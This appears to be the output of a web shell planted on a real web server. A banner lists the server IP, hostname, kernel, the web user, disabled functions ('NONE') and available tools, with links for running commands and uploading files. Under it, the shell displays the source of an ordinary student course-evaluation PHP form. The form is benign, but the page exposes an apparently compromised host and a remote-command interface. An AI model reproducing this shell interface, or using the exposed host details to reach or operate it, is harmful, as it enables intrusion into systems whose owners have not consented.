Server IP : 172.16.15.8 / Your IP : 18.225.149.158 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/brmorrison/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File name: session2b.php --> <?php session_start(); ?> <CENTER> <FONT color=blue size=4> Course Eval <HR> <?php $n1 = $_POST['StudentsName']; $course = $_POST['course']; $_SESSION['v1'] = $n1; $_SESSION['v2'] = $course; ?> <HR> <FORM action=session3b.php method=post> 1. Did you find this course useful? <INPUT type=radio name=q1 value=a checked> Strong Agree <INPUT type=radio name=q1 value=b> Agree <INPUT type=radio name=q1 value=c> Dissagree <INPUT type=radio name=q1 value=d> Strong Dissagree <P> 2. Did you find it easy to understand the topics covered? <INPUT type=radio name=q2 value=a checked> Strong Agree <INPUT type=radio name=q2 value=b> Agree <INPUT type=radio name=q2 value=c> Dissagree <INPUT type=radio name=q2 value=d> Strong Dissagree <P> 3. Would you recomend this course to another student? <INPUT type=radio name=q3 value=a checked> Strong Agree <INPUT type=radio name=q3 value=b> Agree <INPUT type=radio name=q3 value=c> Dissagree <INPUT type=radio name=q3 value=d> Strong Dissagree <P> <INPUT type=submit value=Submit> <INPUT type=reset value=Reset> </Form> </FONT> </CENTER>